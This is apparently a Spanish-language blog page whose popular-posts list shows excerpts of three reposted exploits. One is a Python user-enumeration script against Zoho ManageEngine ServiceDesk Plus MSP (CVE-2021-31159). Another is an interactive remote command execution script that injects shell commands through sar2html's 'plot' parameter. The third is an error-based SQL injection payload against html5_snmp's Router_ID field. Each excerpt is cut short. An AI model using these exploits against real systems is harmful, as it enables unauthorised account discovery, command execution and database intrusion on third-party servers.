VIDEO DE PRESENTACION


Comentarios

Publicar un comentario

Entradas más populares de este blog

Imagen
  # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3 . disable_warnings ( urllib3 . exceptions . InsecureRequestWarning ) def get_args ( ) : parser = argparse . ArgumentParser ( ) parser . add_argument ( '-d' , '--domain' , required = True , action = 'store' , help = 'Domain to attack' ) ...
Leer más
Imagen
  # Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input ( "Enter The url => " ) class Terminal ( Cmd ) : prompt = "Command => " def default ( self , args ) : exploiter ( args ) def exploiter ( cmd ) : global url sess = requests . session ( ) output = sess . get ( f "{url}/index.php?plot=;{cmd}" ) try : out = re . findall ( "<option value=(.*?)>" , output . text ) except : print ( "Error!!" ) for ouut in out : if "There is no defined host..." not in ouut : if "null selected" not i...
Leer más

variables ojk..

  # Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/lolypop55/html5_snmp # Software Link: https://github.com/lolypop55/html5_snmp.git # Version: 1.11 # Tested on: CentOS 7 # CVE: N/A # PoC for error, time, boolean and Union based SQL Injection # Parameter: Router_ID (POST) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=...
Leer más